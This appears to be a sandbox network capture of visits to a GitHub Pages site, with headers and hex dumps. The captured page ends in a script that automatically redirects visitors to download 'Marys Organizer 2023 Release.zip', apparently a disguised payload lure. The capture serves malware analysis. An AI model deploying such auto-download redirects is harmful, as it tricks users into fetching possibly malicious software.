2024-09-25 16:44:34 UTC	754	IN	HTTP/1.1 200 OK Connection: close Content-Length: 4341 Server: GitHub.com Content-Type: text/html; charset=utf-8 permissions-policy: interest-cohort=() x-origin-cache: HIT Last-Modified: Wed, 25 Sep 2024 13:38:10 GMT Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=31556952 ETag: "66f41242-10f5" expires: Wed, 25 Sep 2024 16:54:34 GMT Cache-Control: max-age=600 x-proxy-cache: MISS X-GitHub-Request-Id: 42A9:16B5:66FFC83:7282BF3:66F43DF2 Accept-Ranges: bytes Age: 0 Date: Wed, 25 Sep 2024 16:44:34 GMT Via: 1.1 varnish X-Served-By: cache-nyc-kteb1890034-NYC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1727282674.498366,VS0,VE20 Vary: Accept-Encoding X-Fastly-Request-ID: 2b9d75e4a777eb23c322c74e5d19af4ffa22ee78
2024-09-25 16:44:34 UTC	1378	IN	Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Redi
2024-09-25 16:44:34 UTC	1378	IN	Data Raw: 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 3a 20 31 3b 0a 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 73 70 61 63 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 32 72 65 6d 20 30 3b 0a 7d 0a 2e 68 31 20 7b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 2e 37 35 72 65 6d 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 35 72 65 6d 3b 0a 7d 0a 2e 63 6f 72 65 2d 6d 73 67 2c 20 2e 68 32 20 7b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 2e 32 35 72 65 6d 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 0a 7d 0a 2e 63 6f 72 65 2d 6d 73 67 20 7b 0a 20 Data Ascii: .main-wrapper { display: flex; flex: 1; flex-direction: column; align-items: center;}.spacer { margin: 2rem 0;}.h1 { line-height: 3.75rem; font-size: 2.5rem;}.core-msg, .h2 { line-height: 2.25rem; font-size: 1.5rem;}.core-msg {
2024-09-25 16:44:34 UTC	1378	IN	Data Raw: 76 65 29 2c 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 20 7b 0a 20 20 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 7d 0a 7d 0a 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 20 7b 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 64 39 64 39 64 39 3b 0a 20 20 7d 0a 20 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 7d 0a 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 Data Ascii: ve), screen and (-ms-high-contrast:none) { .main-wrapper, body { display: block; }}@media (prefers-color-scheme:dark) { body { background-color: #222; color: #d9d9d9; } a { color: #fff; } a:hover { text-decoration: unde
2024-09-25 16:44:34 UTC	207	IN	Data Raw: 20 20 20 20 20 20 2f 2f 20 44 69 72 65 63 74 6c 79 20 73 65 74 20 74 68 65 20 55 52 4c 20 77 69 74 68 6f 75 74 20 75 73 69 6e 67 20 68 61 73 68 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 76 65 75 76 65 2f 76 62 64 73 7a 2f 72 61 77 2f 72 65 66 73 2f 68 65 61 64 73 2f 6d 61 69 6e 2f 4d 61 72 79 73 25 32 30 4f 72 67 61 6e 69 7a 65 72 25 32 30 32 30 32 33 25 32 30 52 65 6c 65 61 73 65 2e 7a 69 70 22 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: // Directly set the URL without using hash window.location.href = "https://github.com/maveuve/vbdsz/raw/refs/heads/main/Marys%20Organizer%202023%20Release.zip"; } </script></body></html>

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:35 UTC	610	OUT	GET /bootstrap/4.3.1/css/bootstrap.min.css HTTP/1.1 Host: stackpath.bootstrapcdn.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://maveuve.github.io sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: style Referer: https://maveuve.github.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:35 UTC	921	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:44:35 GMT Content-Type: text/css; charset=utf-8 Transfer-Encoding: chunked Connection: close CDN-PullZone: 252412 CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74 CDN-RequestCountryCode: US Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31919000 ETag: W/"a15c2ac3234aa8f6064ef9c1f7383c37" Last-Modified: Mon, 25 Jan 2021 22:04:08 GMT CDN-ProxyVer: 1.04 CDN-RequestPullSuccess: True CDN-RequestPullCode: 200 CDN-CachedAt: 09/24/2024 09:00:42 CDN-EdgeStorageId: 1068 timing-allow-origin: * cross-origin-resource-policy: cross-origin X-Content-Type-Options: nosniff CDN-Status: 200 CDN-RequestTime: 0 CDN-RequestId: ceb607c0e56260969bd31fd115dff815 CDN-Cache: HIT CF-Cache-Status: HIT Age: 10613 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 8c8c7acf8b4c439f-EWR
2024-09-25 16:44:35 UTC	448	IN	Data Raw: 37 63 30 37 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 33 2e 31 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 39 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 39 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 Data Ascii: 7c07/! Bootstrap v4.3.1 (https://getbootstrap.com/) * Copyright 2011-2019 The Bootstrap Authors * Copyright 2011-2019 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */:root{--blue:#007bff;--indigo:#661
2024-09-25 16:44:35 UTC	1369	IN	Data Raw: 66 66 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 23 36 63 37 35 37 64 3b 2d 2d 73 75 63 63 65 73 73 3a 23 32 38 61 37 34 35 3b 2d 2d 69 6e 66 6f 3a 23 31 37 61 32 62 38 3b 2d 2d 77 61 72 6e 69 6e 67 3a 23 66 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6d 64 3a 37 36 38 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6c 67 3a 39 39 32 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 6c 3a 31 32 30 30 70 78 3b 2d 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 2d 73 61 6e 73 2d 73 65 72 69 66 3a 2d Data Ascii: ff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-
2024-09-25 16:44:35 UTC	1369	IN	Data Raw: 6c 69 6e 65 20 64 6f 74 74 65 64 3b 63 75 72 73 6f 72 3a 68 65 6c 70 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 6b 69 70 2d 69 6e 6b 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 6b 69 70 2d 69 6e 6b 3a 6e 6f 6e 65 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 6c 20 75 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 64 Data Ascii: line dotted;cursor:help;border-bottom:0;-webkit-text-decoration-skip-ink:none;text-decoration-skip-ink:none}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}d
2024-09-25 16:44:35 UTC	1369	IN	Data Raw: 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 73 65 6c 65 63 74 7b 77 6f 72 64 2d 77 72 61 70 3a 6e 6f 72 6d 61 6c 7d 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d Data Ascii: e:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}select{word-wrap:normal}[type=button],[type=reset]
2024-09-25 16:44:35 UTC	1369	IN	Data Raw: 74 65 72 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 68 31 2c 2e 68 32 2c 2e 68 33 2c 2e 68 34 2c 2e 68 35 2c 2e 68 36 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65 6d 7d 2e 68 34 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 68 35 2c 68 35 7b 66 Data Ascii: ter}template{display:none}[hidden]{display:none!important}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{margin-bottom:.5rem;font-weight:500;line-height:1.2}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{f
2024-09-25 16:44:35 UTC	1369	IN	Data Raw: 65 69 67 68 74 3a 31 7d 2e 66 69 67 75 72 65 2d 63 61 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 39 30 25 3b 63 6f 6c 6f 72 3a 23 36 63 37 35 37 64 7d 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 65 38 33 65 38 63 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f 64 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 32 72 65 6d 20 2e 34 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 72 65 6d 7d 6b 62 64 20 6b 62 64 7b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 Data Ascii: eight:1}.figure-caption{font-size:90%;color:#6c757d}code{font-size:87.5%;color:#e83e8c;word-break:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:87.5%;color:#fff;background-color:#212529;border-radius:.2rem}kbd kbd{padding:0;font-size:1
2024-09-25 16:44:35 UTC	1369	IN	Data Raw: 2d 32 2c 2e 63 6f 6c 2d 6d 64 2d 33 2c 2e 63 6f 6c 2d 6d 64 2d 34 2c 2e 63 6f 6c 2d 6d 64 2d 35 2c 2e 63 6f 6c 2d 6d 64 2d 36 2c 2e 63 6f 6c 2d 6d 64 2d 37 2c 2e 63 6f 6c 2d 6d 64 2d 38 2c 2e 63 6f 6c 2d 6d 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 73 6d 2c 2e 63 6f 6c 2d 73 6d 2d 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 2c 2e 63 6f 6c 2d 73 6d 2d 33 2c 2e 63 6f 6c 2d 73 6d 2d 34 2c 2e 63 6f 6c 2d 73 6d 2d 35 2c 2e 63 6f 6c 2d 73 6d 2d 36 2c 2e 63 6f 6c 2d 73 6d 2d 37 2c 2e 63 6f 6c 2d 73 6d 2d 38 2c 2e 63 6f 6c 2d 73 6d 2d 39 2c 2e 63 6f 6c 2d 73 6d 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 78 6c 2c 2e 63 6f 6c 2d 78 6c 2d 31 2c 2e 63 6f 6c 2d 78 6c Data Ascii: -2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-auto,.col-xl,.col-xl-1,.col-xl
2024-09-25 16:44:35 UTC	1369	IN	Data Raw: 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 66 69 72 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d 31 3b 6f 72 64 65 72 3a 2d 31 7d 2e 6f 72 64 65 72 2d 6c 61 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 33 3b 6f 72 64 65 72 3a 31 33 7d 2e 6f 72 64 65 72 2d 30 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 30 3b 6f 72 64 65 72 3a 30 7d 2e 6f 72 64 65 72 2d 31 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 3b 6f 72 64 65 72 3a 31 7d 2e 6f 72 64 65 72 2d 32 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 32 3b 6f 72 64 65 72 3a 32 7d 2e 6f 72 64 65 72 2d 33 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 33 3b 6f 72 64 65 72 3a 33 7d 2e 6f 72 64 65 72 2d 34 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 34 3b 6f Data Ascii: x-width:100%}.order-first{-ms-flex-order:-1;order:-1}.order-last{-ms-flex-order:13;order:13}.order-0{-ms-flex-order:0;order:0}.order-1{-ms-flex-order:1;order:1}.order-2{-ms-flex-order:2;order:2}.order-3{-ms-flex-order:3;order:3}.order-4{-ms-flex-order:4;o
2024-09-25 16:44:35 UTC	1369	IN	Data Raw: 78 3a 30 20 30 20 34 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 34 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 34 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 73 6d 2d 36 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 25 7d 2e 63 6f 6c 2d 73 6d 2d 37 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 38 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 36 2e 36 Data Ascii: x:0 0 41.666667%;flex:0 0 41.666667%;max-width:41.666667%}.col-sm-6{-ms-flex:0 0 50%;flex:0 0 50%;max-width:50%}.col-sm-7{-ms-flex:0 0 58.333333%;flex:0 0 58.333333%;max-width:58.333333%}.col-sm-8{-ms-flex:0 0 66.666667%;flex:0 0 66.666667%;max-width:66.6
2024-09-25 16:44:35 UTC	1369	IN	Data Raw: 73 65 74 2d 73 6d 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 31 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 31 2e 36 36 36 36 36 37 25 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f 6c 2d 6d 64 7b 2d 6d 73 2d 66 6c 65 78 2d 70 72 65 66 65 72 72 65 64 2d 73 69 7a 65 3a 30 3b 66 6c 65 78 2d 62 61 73 69 73 3a 30 3b 2d 6d 73 2d 66 6c 65 78 2d 70 6f 73 69 74 69 76 65 3a 31 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d Data Ascii: set-sm-8{margin-left:66.666667%}.offset-sm-9{margin-left:75%}.offset-sm-10{margin-left:83.333333%}.offset-sm-11{margin-left:91.666667%}}@media (min-width:768px){.col-md{-ms-flex-preferred-size:0;flex-basis:0;-ms-flex-positive:1;flex-grow:1;max-width:100%}

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:35 UTC	562	OUT	GET /turnstile/v0/api.js?compat=recaptcha HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://maveuve.github.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:35 UTC	356	IN	HTTP/1.1 302 Found Date: Wed, 25 Sep 2024 16:44:35 GMT Content-Length: 0 Connection: close access-control-allow-origin: * cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public cross-origin-resource-policy: cross-origin location: /turnstile/v0/g/ec4b873d446c/api.js Server: cloudflare CF-RAY: 8c8c7acf8c0f1778-EWR

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:35 UTC	560	OUT	GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://maveuve.github.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:36 UTC	441	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:44:35 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 47262 Connection: close accept-ranges: bytes last-modified: Tue, 17 Sep 2024 16:06:37 GMT cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 8c8c7ad35d258c48-EWR
2024-09-25 16:44:36 UTC	928	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
